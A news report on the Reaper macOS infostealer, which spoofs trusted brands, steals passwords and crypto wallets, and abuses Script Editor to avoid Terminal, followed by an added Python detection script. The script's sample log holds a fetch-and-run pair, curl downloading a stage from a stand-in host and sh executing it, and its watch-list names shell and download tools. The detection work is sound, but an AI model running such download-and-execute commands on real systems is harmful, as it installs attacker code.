Do fear the Reaper - stealer swipes macOS users' passwords, wallets, then backdoors them
While also spoofing all the trusted domains - Apple, Microsoft, and Google - in the same attack
A new infostealer variant targets macOS users by spoofing Apple, Microsoft, and Google, then gets to work searching for victims’ password managers so it can steal all of their credentials and access cryptocurrency wallets such as MetaMask and Phantom.
The updated SHub stealer variant is called Reaper, and it uses macOS Script Editor, pre-populated with the malicious payload, to execute the malware, according to SentinelOne research engineer Phil Stokes, who documented the attack in a Monday blog post.
But unlike earlier SHub versions and similar macOS stealer campaigns that rely on ClickFix social engineering tactics to trick the user into pasting a Script Editor command into Apple’s Terminal command-line interface, Reaper bypasses Terminal altogether and therefore defeats the defenses Apple added in macOS Tahoe 26.4.
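Because the execution path described above never touches Terminal, detections keyed on Terminal-spawned shells will miss it; the natural hunting pivot is the parent process instead. The following is an added example (not code from the article or from SentinelOne) that scans process-creation telemetry for children of Script Editor that a script editor has little legitimate reason to launch. The JSON record schema, the sample log lines, the `osascript` entry and the watch-list of child process names are all constructed assumptions and should be tuned to the telemetry source and environment in use.

```python
"""Hunt for child processes launched by macOS Script Editor.

Added example for the Reaper write-up above; not code from the article or
SentinelOne. The record schema, sample lines and watch-lists are constructed.
"""
import json
from typing import Iterable

# Script hosts the article says Reaper abuses to run its payload without
# Terminal. "osascript" is an assumption: it is the command-line front end to
# the same AppleScript/JXA engine, so the same logic is worth applying to it.
SCRIPT_HOSTS = {"Script Editor", "osascript"}

# Children a script editor rarely needs to spawn (constructed watch-list).
SUSPICIOUS_CHILDREN = {"curl", "sh", "bash", "zsh", "python3", "base64", "openssl", "xattr"}


def parse_event(line: str) -> dict:
    """Parse one JSON process-creation record (constructed schema:
    ts, parent, process, args, user)."""
    return json.loads(line)


def is_suspicious(event: dict) -> bool:
    """True when a script host spawned a child from the watch-list."""
    return event.get("parent") in SCRIPT_HOSTS and event.get("process") in SUSPICIOUS_CHILDREN


def hunt(lines: Iterable[str]) -> list[dict]:
    """Return every suspicious event, preserving log order."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines in the feed
        event = parse_event(line)
        if is_suspicious(event):
            hits.append(event)
    return hits


# Constructed sample telemetry: a normal Terminal session, a Finder app
# launch, Script Editor spawning itself, and two Script Editor children
# that should be flagged.
SAMPLE_LOG = """
{"ts": "2025-03-10T09:12:01Z", "parent": "Terminal", "process": "zsh", "args": "zsh -l", "user": "alice"}
{"ts": "2025-03-10T09:13:44Z", "parent": "Script Editor", "process": "curl", "args": "curl -fsSL http://example.invalid/stage", "user": "alice"}
{"ts": "2025-03-10T09:13:45Z", "parent": "Script Editor", "process": "sh", "args": "sh /tmp/stage", "user": "alice"}
{"ts": "2025-03-10T09:14:02Z", "parent": "Finder", "process": "Miro", "args": "/Applications/Miro.app/Contents/MacOS/Miro", "user": "alice"}
{"ts": "2025-03-10T09:15:30Z", "parent": "Script Editor", "process": "Script Editor", "args": "", "user": "alice"}
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['user']}: {hit['parent']} -> {hit['process']} {hit['args']}")
```

Run against the constructed sample, `hunt` returns the two Script Editor children (`curl`, then `sh`) and nothing else; the Terminal-spawned shell is deliberately not flagged, which is the point of pivoting the detection to the script host rather than to Terminal.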
The attack starts with fake WeChat and Miro installer...
Copyright of this story belongs solely to theregister.com.